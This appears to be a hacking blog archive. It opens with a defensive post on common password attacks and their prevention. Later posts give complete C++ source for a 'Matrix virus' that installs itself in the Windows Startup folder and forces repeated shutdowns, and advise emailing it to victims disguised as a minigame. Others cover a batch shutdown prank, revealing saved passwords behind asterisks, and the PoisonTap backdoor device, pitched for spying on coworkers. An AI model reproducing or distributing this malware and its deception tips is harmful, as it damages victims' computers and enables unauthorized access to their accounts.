Wednesday, January 3, 2018

5 Most Commonly Used Method To Hack And Preventive Measures


There are number of methods used by hackers to hack your Email/Social Network account and get your personal information. Today I will let you know 5 Most commonly used method to hack or crack your account password and preventive actions to avoid such attacks. This article will help to make your account safe.


1.      Brute Force Attack:

Brute Force attack or cracking is a hit and trial method to match all possible combinations of password. In Brute Force attack, that automated tool calculates every possible combination of numbers, letters and special characters that could make up a password and test that password whether it is the correct password or not. The cracking time is determined by the length and complexity of the password. This means short passwords can usually be cracked quite quickly.


Preventive Measures: Always use long and complex passwords using upper and lowercase letters along with numbers and special characters. Brute-force attack will take decades to crack long and complex passwords.


2.      Social Engineering

In Social engineering, hacker try to manipulate known person to gain trust and get information from them. Hacker can call his co-worker or friend and pretend to be from the IT department and ask for his login details. Nowadays hackers are calling the victims pretending to be from bank and ask for their credit/debit cards details. Many people fall into the trap and lose their money.

Preventive Measures: If someone tries to get your personal, bank details, any password or OTP, never ever give such details on phone or emails.

3.      Keyloggers:

Keylogger can be software and hardware both. Hacker install Keylogger software on victim’s computer by sending any malicious file. Most of the Keylogger work in stealth mode so you can not find them into installed programs. Hacker can monitor every keystore including passwords and control the computer remotely. Cyber Cafe’s operator connect keyboard in hardware Keylogger and collect all your information.

Preventive Measures: Never use cyber cafe or someone else computer to login on your bank account. If its important use on-screen or virtual keyboard while tying the login.  Never open any email attachment if it comes from unknown source or user.


4.      Phishing:

Phishing is the popular hacking method used by hackers to get someone login details. In Phishing attack hacker create fake page of any real website and send to victim. If receiver put his login detail on this fake page, this page sends all details to hacker. It’s very easy to create such kind of fake pages and host on servers.

Preventive Measures: Always make sure that websites url is correct. For example, URL of phishing page of ICICI might look like ICIICI.com (As you can see There are two "I").

5.      Guessing:

Guessing easily helps you to get someone password within seconds. In This method, if hacker knows you, he can try to guess your password by using your known information i.e. your name, surname, phone number or date of birth.

Preventive Measures: Never use your name, surname, phone number or date of birth as your password. Always use long and complex passwords using upper and lowercase letters along with numbers and special characters.

Sunday, August 20, 2017

How To Retrieve Password From Dots, Stars or Asterisk


Steps To Get Password :-

1. Select Dots That You Want To Convert.

2. Right Click On Selected Field.

3. Click On Inspect Element.

 4. Then A Footer Bar Will Appear ( See Screen Shot For Re



5. Then Find "Password". (See Screen Shot For Reference )

6. Change "Password" To "text" By Click On It.


7. Done!!!!!!Now You Can See The Password.
 


 

Tuesday, March 28, 2017

How to make a Virus (Destroyer) continued.......

Now i'm going to tell you make a Virus.
Make one called matrix.
Now remember this is not the answer to all your revenge needs.
The best way to get revenge is to make a FAKE virus that just scares the crap out of them.
If you want to do something constructive with a virus send it to someone who has written and forwarded one before, to stop them.
Heed my warning, but if you still want to ruin your life with jail, here you go.
Step 1- open notepad.
Step 2- paste this...
// The Matrix Virus
// Created by W3irdo
// Hazuras.com

#include
#include
#include
#include
#include
#include
#include
using namespace std;

int main()
{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);

{
char buffer[255];
char inputFile[]="C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat";
ifstream input(inputFile);
if (!input)
{
{
ofstream fp("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat", ios::app);
fp << "@ECHO OFF \n";
fp << "START C:\\rawr.exe \n";
fp << "EXIT";
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}

{
char buffer[255];
char inputFile[]="C:\\rawr.exe";
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp("CLICK.bat", ios::app);
fp << "@ECHO OFF \n";
fp << "COPY matrix.exe C:\\rawr.exe \n";
fp << "START C:\\rawr.exe \n";
fp << "EXIT";
}
system("START CLICK.bat");
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
}
}
}

START:{
for(int i = 0; i < 1; i++)
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout << setw(4) << num;
cout << setw(4) << "0%";
cout << setw(4) << "P";
cout << setw(4) << " ";
cout << setw(4) << ")";
cout << setw(4) << "#";
cout << setw(4) << "X";
cout << setw(4) << "@";
cout << setw(4) << "1&";
cout << setw(4) << "*";
cout << setw(4) << "||";
cout << setw(4) << " \a";
Sleep(60);
}
}
for ( int j = 0; j < 5; j++)
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout << setw(4) << number;
}
goto START;
}

then save it as whatever you want as long as you save it to be a .exe
Email it and tell them it's a really cool minigame.
I recommend naming it as the game you say it is.
Hope you don't ruin someone innocent's computer.

Sunday, March 26, 2017

How to make a VIRUS

I'm sure that everyone dreamed just once to make a virus and spread him.I personally dreamed to make a big virus and spread it I recognize.Today I've found that you don't need any advanced skills to make a virus.Anyone can make one with a few simple mouse clicks.Today I'm telling you about a prank virus but if you are interested to know how to make a dangerous virus I'll tell you definitely. It's a promise.......

First of all right click on desktop> new>notepad
then copy and paste given content only :

@echo off
shutdown -s -t 60 -c "You have been hacked!"


You can write in “ ” whatever you want.
Then click on file > save as
Put the name with .bat e.g.: hello.bat
After that double click on that and BOOM
After 60 sec. your PC will be shutdown.
But you can prevent this want to know?
Follow these steps:
Click RUN, type shutdown –a and press Enter.

Good bye…..I’ll show you how to destroy a PC of your rivals.

Thursday, November 17, 2016

Hack Locked Computer using $5 Device (PoisionTap)



If you think that your computer is safe when it is locked with a strong password, then Samy Kamkar’s device PoisionTap will make you wrong. This cheap exploit tool takes just 30 seconds to install a privacy-invading backdoor into your computer.

PoisionTap, a tiny $5 Raspberry Pi Zero microcomputer loaded with Node.js code and attached to a USB adapter. Inventor has publicly released the source code to PoisionTap, so that any would-be hacker can try it out for themselves.

If you are a hacker and want to hack or get information of any of your coworker in your office. All you need is to plug this device in the target computer and wait. PoisonTap targets the victim’s browser cache and injects the malicious code there.

Once the hacking tool is recognized by the target machine, it is loaded as a low-priority network device that starts impersonating a new Ethernet connection and runs a DHCP request across it. The machine sends a DHCP request to the tool that in response tells it that the entire IPv4 address space is part of PoisonTap’s local network. In this way, the entire traffic it routed through the PoisonTap device before reaching the legitimate gateway to the Internet. With this trick, it intercepts all unencrypted Web traffic and steals any HTTP authentication cookies used to log into private accounts as well as sessions for the Alexa top 1 Million sites.

PoisonTap will give you an invisible position on the local network to connect to the intranet site and send data to a remote server. Now this computer will be in your control even after this tool is unplugged from the targeted computer. Since it uses siphons cookies, you can also hijack the target user's online accounts even they are secured with two-factor authentication (2FA).

Inventor says “it can also bypass many other security mechanisms, including same-origin policy (SOP), HttpOnly cookies, X-Frame-Options HTTP response headers, DNS pinning and cross-origin resource sharing (CORS). Whenever the websocket is open, the attacker can remotely send commands to the victim and force their browser to execute JavaScript code

There is no easy fix available for users as long as a web browser application is running in the background.